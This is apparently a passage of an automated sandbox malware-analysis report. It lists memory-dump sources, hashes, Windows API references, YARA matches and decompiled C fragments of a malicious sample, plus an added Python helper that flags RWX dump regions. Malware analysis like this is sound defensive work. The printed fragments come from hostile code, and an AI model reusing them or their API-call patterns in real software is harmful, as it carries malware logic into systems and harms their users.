                                                                                                  • Instruction ID: 2c2b34aedc846ab3ae484734a1171ee081eb0df99b6426d3cac892bcac86a451
                                                                                                  • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                                                                  • Instruction Fuzzy Hash: 7CD012752003146BD710EF99DC45ED7775CEF44750F154459BA185B242C930F90086E4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 6ce0e258aa738072e7f647c51230e9201616741c23f9c2d0737f4fa7881f3263
                                                                                                  • Instruction ID: 38c60c9c5987a87ade63d86acf0ad3c52234d84a5a182d682657b57437046be7
                                                                                                  • Opcode Fuzzy Hash: 6ce0e258aa738072e7f647c51230e9201616741c23f9c2d0737f4fa7881f3263
                                                                                                  • Instruction Fuzzy Hash: C190026260100502E21171994404616044AD7D0381F91C076A102455DECAA589A2F171
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 59d7e19e3eca5daac8c048b8cf78f22be02dbb158a0acd4685114866447d0f96
                                                                                                  • Instruction ID: 33d3b366108972303e3c52bfb089dde854f3d0e071710561d69626bfdc4f1fd3
                                                                                                  • Opcode Fuzzy Hash: 59d7e19e3eca5daac8c048b8cf78f22be02dbb158a0acd4685114866447d0f96
                                                                                                  • Instruction Fuzzy Hash: 8890027220100413E221619945047070449D7D0381F91C466A042455CD96D68962F161
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: bc7148191d4a4c85a8cac427bd876d1c1ba18785299265bcf516f4a730e93b23
                                                                                                  • Instruction ID: f9270b7e0f82d6f1991b7aef2c8e4c4914d400f4d228e2201784994da99aba5e
                                                                                                  • Opcode Fuzzy Hash: bc7148191d4a4c85a8cac427bd876d1c1ba18785299265bcf516f4a730e93b23
                                                                                                  • Instruction Fuzzy Hash: 7090026224204152A655B19944045074446E7E0381791C066A1414958C85A69866E661
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: e2465bee407adce523d220016577bb21d6f48f7055d0ec5b486a879eb308ffed
                                                                                                  • Instruction ID: a49be56c60f79f66e4f4417ddec70c7bf654e831ac47f2e65f4b450003604300
                                                                                                  • Opcode Fuzzy Hash: e2465bee407adce523d220016577bb21d6f48f7055d0ec5b486a879eb308ffed
                                                                                                  • Instruction Fuzzy Hash: 8F9002A234100442E21061994414B060445D7E1341F51C069E106455CD8699CC62B166
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 769860cbb8a378638b446b86791a193f94f43d38e60c27f11ea6b958babcc5ed
                                                                                                  • Instruction ID: 53e9bd124b765e80f14eaa712b881d3c6c690ff46bca6d91d9c9a931c7c1ba39
                                                                                                  • Opcode Fuzzy Hash: 769860cbb8a378638b446b86791a193f94f43d38e60c27f11ea6b958babcc5ed
                                                                                                  • Instruction Fuzzy Hash: D99002A220200003921571994414616444AD7E0341B51C075E1014598DC5A588A1B165
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 6725ef145efd79e6a99f7c681cd2f1432383489db19a5540b36a4f3c0346ad90
                                                                                                  • Instruction ID: aee400a18e5975c5bd04f11886a138cf87def92b3cb6faa3bd63cf6596d6fe2a
                                                                                                  • Opcode Fuzzy Hash: 6725ef145efd79e6a99f7c681cd2f1432383489db19a5540b36a4f3c0346ad90
                                                                                                  • Instruction Fuzzy Hash: 5B9002B220100402E250719944047460445D7D0341F51C065A506455CE86D98DE5B6A5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: d1f53b4ba7b9d7b3038867c66f0122e005ca26360ffa9b6cc92e5a4dd0f64672
                                                                                                  • Instruction ID: a47fe44ee44b720e8bbaf41e346c382c2bf0c91f565b75253757819afc6111ea
                                                                                                  • Opcode Fuzzy Hash: d1f53b4ba7b9d7b3038867c66f0122e005ca26360ffa9b6cc92e5a4dd0f64672
                                                                                                  • Instruction Fuzzy Hash: 80900266211000035215A59907045070486D7D5391351C075F1015558CD6A18871A161
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: fd559f523f5275fc286e5b43bf21da97c4ca7295e206d7ffff02f655618a8751
                                                                                                  • Instruction ID: b39a88afcfee89752d381567343b55fa3eb99d4b6067ad06a13de3de3180f2c5
                                                                                                  • Opcode Fuzzy Hash: fd559f523f5275fc286e5b43bf21da97c4ca7295e206d7ffff02f655618a8751
                                                                                                  • Instruction Fuzzy Hash: 1490027220108802E2206199840474A0445D7D0341F55C465A442465CD86D588A1B161
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 45606073b0eb2c7beaa070f176b7c934d3fa5b3ff2f9b9d18c9f67df5a8b63b6
                                                                                                  • Instruction ID: 721f9cb85ee728b2a5c9d17bf2a08e603cc9c910fa433705a222a7d8d73de292
                                                                                                  • Opcode Fuzzy Hash: 45606073b0eb2c7beaa070f176b7c934d3fa5b3ff2f9b9d18c9f67df5a8b63b6
                                                                                                  • Instruction Fuzzy Hash: E090026260100042925071A988449064445FBE1351751C175A0998558D85D98875A6A5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 18155b5369bfdd871277294abe6f630a8946b7204f7a8c64200d22f2f3e80fbb
                                                                                                  • Instruction ID: f8dafc996cad0b1420dcb86850c8424528aa4540b361dd03382a96d5af7b2aa9
                                                                                                  • Opcode Fuzzy Hash: 18155b5369bfdd871277294abe6f630a8946b7204f7a8c64200d22f2f3e80fbb
                                                                                                  • Instruction Fuzzy Hash: 6F90027220140402E2106199481470B0445D7D0342F51C065A116455DD86A58861B5B1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 6ea121f0730567060e99a15ef92669b1358f30c93a174bb0e2fef9ae4e3e95e5
                                                                                                  • Instruction ID: 89217e3e766221b55d344b28853367cdf4ff66c9f2eed02b7efd8e73c17df286
                                                                                                  • Opcode Fuzzy Hash: 6ea121f0730567060e99a15ef92669b1358f30c93a174bb0e2fef9ae4e3e95e5
                                                                                                  • Instruction Fuzzy Hash: C790027220100802E2907199440464A0445D7D1341F91C069A002565CDCA958A69B7E1
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: ed214d98f9d2b6e48766cefadb3b2f1b46dfba1c07b43fb5fa9a75bd06602ea0
                                                                                                  • Instruction ID: c31aad2699236ece3cc13049112d8348dfaa9e4ebf4db858b6c1282cf15b66a9
                                                                                                  • Opcode Fuzzy Hash: ed214d98f9d2b6e48766cefadb3b2f1b46dfba1c07b43fb5fa9a75bd06602ea0
                                                                                                  • Instruction Fuzzy Hash: 4F90026221180042E31065A94C14B070445D7D0343F51C169A015455CCC9958871A561
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 09a7a6aa45aa79aa076b1b6e84098ed5721290a436c942c6f2a0a5fd7a6ea331
                                                                                                  • Instruction ID: 1b0a651735c27ed3dccb8e1106bc2ece52c520f72a5df2fa31cc4aedb203255d
                                                                                                  • Opcode Fuzzy Hash: 09a7a6aa45aa79aa076b1b6e84098ed5721290a436c942c6f2a0a5fd7a6ea331
                                                                                                  • Instruction Fuzzy Hash: 1C90026230100003E250719954186064445E7E1341F51D065E041455CCD9958866A262
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 2b5484583c8e11abf0546e6163a48aea15437662e91a463176ea86ecbd87aac4
                                                                                                  • Instruction ID: 25d84ef502cca678b9d6221c364d5445cc460ae19c2d623ee562180b4174949b
                                                                                                  • Opcode Fuzzy Hash: 2b5484583c8e11abf0546e6163a48aea15437662e91a463176ea86ecbd87aac4
                                                                                                  • Instruction Fuzzy Hash: E290026A21300002E2907199540860A0445D7D1342F91D469A001555CCC9958879A361
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 9be0f6a5772e487741c7565a3e0711ed71eeb48b8dec782d9d854aab43c05de0
                                                                                                  • Instruction ID: dc216a90dba302d4eee3dbe0a699ba85f72e60d12f14376749cf7359fa4ac185
                                                                                                  • Opcode Fuzzy Hash: 9be0f6a5772e487741c7565a3e0711ed71eeb48b8dec782d9d854aab43c05de0
                                                                                                  • Instruction Fuzzy Hash: 0C90027231114402E220619984047060445D7D1341F51C465A082455CD86D588A1B162
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp, Offset: 00A90000, based on PE: true
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID:
                                                                                                  • API String ID: 2994545307-0
                                                                                                  • Opcode ID: 1d1c3691f6fc03f77f66d7b53a444ad82dc1009b050545e96bbc7e52c78f39b7
                                                                                                  • Instruction ID: 1f03a23ec1a8910f98b96e5c7e67ed0ff46a3554234b994723c3a80cd6ab346f
                                                                                                  • Opcode Fuzzy Hash: 1d1c3691f6fc03f77f66d7b53a444ad82dc1009b050545e96bbc7e52c78f39b7
                                                                                                  • Instruction Fuzzy Hash: BF90027220100402E21065D954086460445D7E0341F51D065A502455DEC6E588A1B171
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.275453010.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                                                  • Instruction ID: 5568bf364e599ab98db8d6cec98c55b42aa716c8f34da205b899e6f8c2a7a87e
                                                                                                  • Opcode Fuzzy Hash: 283bf2c7f344e97b91bcc60d13a5b0e411dcd70c841c71c3deed8c9853ae10d6
                                                                                                  • Instruction Fuzzy Hash: EF213CB2C4420857CB20E6649D42BFF73BC9B50304F44057FE989A3181F638BB498BA6
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • RtlAllocateHeap.NTDLL(00413506,?,00413C7F,00413C7F,?,00413506,?,?,?,?,?,00000000,00408AE3,?), ref: 004184AD
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: AllocateHeap
                                                                                                  • String ID: hA
                                                                                                  • API String ID: 1279760036-1221461045
                                                                                                  • Opcode ID: 8a42caf356b98fa34850bb707e9e6ac6e7ab7ccefacd45b7d6f322cdc3d839c0
                                                                                                  • Instruction ID: 4f3d825eea56f0d6598943f98f596a4a8ec781e2125e65a81735a9b4ecdda116
                                                                                                  • Opcode Fuzzy Hash: 8a42caf356b98fa34850bb707e9e6ac6e7ab7ccefacd45b7d6f322cdc3d839c0
                                                                                                  • Instruction Fuzzy Hash: 48018CB26002046BDB18EF98DC84DE777ACEF88310B00855EFA499B341CA35E911CBE4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%
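                                                                                                  The "Source File" names under each Memory Dump Source entry encode where the analysed code was captured. As an added example (not part of this report and not Joe Sandbox's own tooling), the following Python parser splits the two names that appear on this page into fields and decodes the protection value. The field roles (process index, dump index, sequence value, region base, page protection, memory type) are an assumption inferred from the shape of the names; the PAGE_* and MEM_* constants are the standard Windows values. If the fifth field is the page protection, 0x40 is PAGE_EXECUTE_READWRITE for both regions the report decompiles, which is the footprint a triage analyst looks for when deciding whether a dump holds unpacked or injected code.

```python
"""Decode sandbox memory-dump file names of the form
00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp
and flag regions that are both writable and executable.

ASSUMPTION (not confirmed by the report): the six dot-separated fields are
process index, dump index, sequence value, region base address, Windows
page protection and memory type. Only the PAGE_*/MEM_* constants below are
certain; they come from winnt.h.
"""
import re
from dataclasses import dataclass
from typing import List

PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
EXECUTABLE = frozenset({0x10, 0x20, 0x40, 0x80})
WRITABLE = frozenset({0x04, 0x08, 0x40, 0x80})

# MEMORY_BASIC_INFORMATION.Type values; anything else is shown as raw hex
# instead of being guessed at.
MEM_TYPE = {0x20000: "MEM_PRIVATE", 0x40000: "MEM_MAPPED", 0x1000000: "MEM_IMAGE"}

_SDMP_NAME = re.compile(
    r"^(?P<proc>[0-9a-fA-F]{8})\.(?P<dump>[0-9a-fA-F]{8})\.(?P<seq>\d+)\."
    r"(?P<base>[0-9a-fA-F]{16})\.(?P<prot>[0-9a-fA-F]{8})\.(?P<mtype>[0-9a-fA-F]{8})\.sdmp$"
)


@dataclass(frozen=True)
class DumpRegion:
    process_index: int
    dump_index: int
    sequence: str
    base: int
    protection: int
    mem_type: int

    @property
    def protection_name(self) -> str:
        return PAGE_PROTECTION.get(self.protection, f"0x{self.protection:08x}")

    @property
    def mem_type_name(self) -> str:
        return MEM_TYPE.get(self.mem_type, f"0x{self.mem_type:08x}")

    @property
    def is_rwx(self) -> bool:
        # Writable and executable at once: typical of unpacked or injected code.
        return self.protection in EXECUTABLE and self.protection in WRITABLE


def parse_dump_name(name: str) -> DumpRegion:
    """Split an .sdmp file name into its fields; raise ValueError if the shape is wrong."""
    m = _SDMP_NAME.match(name)
    if m is None:
        raise ValueError(f"not a recognised .sdmp name: {name!r}")
    return DumpRegion(
        process_index=int(m["proc"], 16),
        dump_index=int(m["dump"], 16),
        sequence=m["seq"],
        base=int(m["base"], 16),
        protection=int(m["prot"], 16),
        mem_type=int(m["mtype"], 16),
    )


def describe(region: DumpRegion) -> str:
    """One triage line per region, marking RWX regions."""
    flag = "  <-- RWX: unpacked/injected code candidate" if region.is_rwx else ""
    return (f"proc {region.process_index} dump {region.dump_index}: base 0x{region.base:08X} "
            f"{region.protection_name} {region.mem_type_name}{flag}")


def flag_rwx_regions(names: List[str]) -> List[DumpRegion]:
    """Return the regions (in input order) whose protection is writable and executable."""
    return [r for r in (parse_dump_name(n) for n in names) if r.is_rwx]


# The first two names are the ones on this report page; the third is a
# constructed name for an executable-but-not-writable image region.
SAMPLE_DUMP_NAMES = [
    "00000003.00000002.275716526.0000000000A90000.00000040.00000001.sdmp",
    "00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp",
    "00000003.00000002.275716527.0000000077000000.00000020.01000000.sdmp",
]

if __name__ == "__main__":
    for n in SAMPLE_DUMP_NAMES:
        print(describe(parse_dump_name(n)))
```

Running the block prints one line per dump; the two regions taken from this page are flagged and the constructed PAGE_EXECUTE_READ image region is not. The sixth field of the 0xA90000 dump (0x00000001) matches no MEM_* constant and is therefore printed as raw hex rather than given a name.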

                                                                                                  C-Code - Quality: 82%
                                                                                                  			E00407260(void* __eflags, intOrPtr _a4, long _a8) {
                                                                                                  				char _v67;
                                                                                                  				char _v68;
                                                                                                  				void* _t12;
                                                                                                  				intOrPtr* _t13;
                                                                                                  				int _t14;
                                                                                                  				long _t21;
                                                                                                  				intOrPtr* _t25;
                                                                                                  				void* _t26;
                                                                                                  				void* _t30;
                                                                                                  
                                                                                                  				_t30 = __eflags;
                                                                                                  				_v68 = 0;
                                                                                                  				E00419D10( &_v67, 0, 0x3f); // memset-like: together with _v68 = 0 this clears a 0x40-byte local buffer
                                                                                                  				E0041A8F0( &_v68, 3);
                                                                                                  				_t12 = E00409B10(_t30, _a4 + 0x1c,  &_v68); // executed
                                                                                                  				_t13 = E00413E20(_a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6); // returns a function pointer selected by the constant 0xc4e7b6d6; it is called indirectly below
                                                                                                  				_t25 = _t13;
                                                                                                  				if(_t25 != 0) {
                                                                                                  					_t21 = _a8; // _a8 is the target thread id passed to PostThreadMessageW
                                                                                                  					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed; 0x111 is WM_COMMAND
                                                                                                  					_t32 = _t14;
                                                                                                  					if(_t14 == 0) {
                                                                                                  						// fallback through the resolved pointer when PostThreadMessageW fails; _t26 and _t32 are decompiler temporaries with no declaration above
                                                                                                  						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409270(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                                                  					}
                                                                                                  					return _t14;
                                                                                                  				}
                                                                                                  				return _t13;
                                                                                                  			}
                                                                                                  Instruction addresses (one per decompiled line above, in order): 0x00407260, 0x0040726f, 0x00407273, 0x0040727e, 0x0040728e, 0x0040729e, 0x004072a3, 0x004072aa, 0x004072ad, 0x004072ba, 0x004072bc, 0x004072be, 0x004072db, 0x004072db, 0x00000000, 0x004072dd, 0x004072e2

                                                                                                  APIs
                                                                                                  • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072BA
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: MessagePostThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 1836367815-0
                                                                                                  • Opcode ID: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                                                  • Instruction ID: ed9c0dd32f68776d22a62b6ccf8dda9c2c93357863a303a75fe51d199eec68b3
                                                                                                  • Opcode Fuzzy Hash: 205fda5ff18a58da29b4ee771503f4b4c431d8485573b34ca04b666bda837a67
                                                                                                  • Instruction Fuzzy Hash: DE018431A8032876E720A6959C03FFE776C5B40B55F15416EFF04BA1C2E6A87D0646EA
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • ExitProcess.KERNEL32(?,?,00000000,?,?,?), ref: 00418528
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ExitProcess
                                                                                                  • String ID:
                                                                                                  • API String ID: 621844428-0
                                                                                                  • Opcode ID: 878dd91fde448f6adbeec5b73caba6a01bc6935c305d8fc1347b88e012e15da3
                                                                                                  • Instruction ID: da8eea28f2eed8a5216adb3dd2a9f9122a5d02af6884edf748c089a63b56ab5d
                                                                                                  • Opcode Fuzzy Hash: 878dd91fde448f6adbeec5b73caba6a01bc6935c305d8fc1347b88e012e15da3
                                                                                                  • Instruction Fuzzy Hash: 570113B2200108BFCB14DF98CC80DEB37A9AF8C354F118258BA1D97341D630ED418BA0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 37%
                                                                                                  			E00418611(void* __eax, void* __ecx, intOrPtr _a4, WCHAR* _a8, WCHAR* _a12, struct _LUID* _a16) {
                                                                                                  				int _t14;
                                                                                                  				void* _t20;
                                                                                                  
                                                                                                  				asm("hlt");
                                                                                                  				asm("cmc");
                                                                                                  				asm("arpl [eax], di");
                                                                                                  				asm("adc ah, [ebp+0x55]");
                                                                                                  				_t11 = _a4;
                                                                                                  				E00418DB0(_t20, _a4, _a4 + 0xc8c,  *((intOrPtr*)(_t11 + 0xa18)), 0, 0x46);
                                                                                                  				_t14 = LookupPrivilegeValueW(_a8, _a12, _a16); // executed
                                                                                                  				return _t14;
                                                                                                  			}

                                                                                                  APIs
                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CF92,0040CF92,00000041,00000000,?,00408B55), ref: 00418650
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: LookupPrivilegeValue
                                                                                                  • String ID:
                                                                                                  • API String ID: 3899507212-0
                                                                                                  • Opcode ID: 824ca6a66ef249cccaad10279097698fa29a500877d035cfbe8693246dc63840
                                                                                                  • Instruction ID: 5f6e250d4f082792119222482a770df913c131ace216949662076a7d01997107
                                                                                                  • Opcode Fuzzy Hash: 824ca6a66ef249cccaad10279097698fa29a500877d035cfbe8693246dc63840
                                                                                                  • Instruction Fuzzy Hash: 5BF0A0752002046FCB10EF54D845ED737A8AF8A340F028058FE4817242DA34AC25CBF5
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 64%
                                                                                                  			E004184B2(void* __eax, void* __edx, void* _a4, long _a8, void* _a12) {
                                                                                                  				intOrPtr _v0;
                                                                                                  				char _t13;
                                                                                                  				void* _t20;
                                                                                                  
                                                                                                  				_push(0x2f);
                                                                                                  				asm("movsb");
                                                                                                  				_t10 = _v0;
                                                                                                  				_t4 = _t10 + 0xc74; // 0xc74
                                                                                                  				E00418DB0(_t20, _v0, _t4,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
                                                                                                  				_t13 = RtlFreeHeap(_a4, _a8, _a12); // executed
                                                                                                  				return _t13;
                                                                                                  			}

                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FreeHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 3298025750-0
                                                                                                  • Opcode ID: 58235990c20f4b1a83f39d9474105fa5a863163e9a67e2de78f26a2c61d2651b
                                                                                                  • Instruction ID: 2ef2388b3282c25476fcb6ea17db52d36279a1a791306a8d8af3171220f45101
                                                                                                  • Opcode Fuzzy Hash: 58235990c20f4b1a83f39d9474105fa5a863163e9a67e2de78f26a2c61d2651b
                                                                                                  • Instruction Fuzzy Hash: C4E06DB66402016FD714EF54DC49FE77B69EF88350F014599B9189B291D631E901CAB0
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 100%
                                                                                                  			E004184C0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                                  				char _t10;
                                                                                                  				void* _t15;
                                                                                                  
                                                                                                  				_t3 = _a4 + 0xc74; // 0xc74
                                                                                                  				E00418DB0(_t15, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                                                  				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                                  				return _t10;
                                                                                                  			}

                                                                                                  APIs
                                                                                                  • RtlFreeHeap.NTDLL(00000060,00408AE3,?,?,00408AE3,00000060,00000000,00000000,?,?,00408AE3,?,00000000), ref: 004184ED
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000001.233988024.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: FreeHeap
                                                                                                  • String ID:
                                                                                                  • API String ID: 3298025750-0
                                                                                                  • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                  • Instruction ID: bd69bb0d8e56be58ea846d441575552e1355d89f45fa104c15060bc9e05e818a
                                                                                                  • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                  • Instruction Fuzzy Hash: EDE01AB12002046BDB14DF59DC45EE777ACAF88750F014559BA0857241CA30E9108AF4
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  C-Code - Quality: 36%
                                                                                                  			E00418480(intOrPtr _a4, void* _a8, intOrPtr _a12, void* _a16) {
                                                                                                  				intOrPtr _t9;
                                                                                                  				void* _t10;
                                                                                                  				void* _t12;
                                                                                                  				void* _t15;
                                                                                                  
                                                                                                  				E00418DB0(_t15, _a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                                                  				_t9 = _a12;
                                                                                                  				_t12 = _a8;
                                                                                                  				asm("les edx, [edx+edx*2]");
                                                                                                  				_push(_t9);
                                                                                                  				_t10 = RtlAllocateHeap(_t12); // executed
                                                                                                  				return _t10;
                                                                                                  			}

                                                                                                  APIs
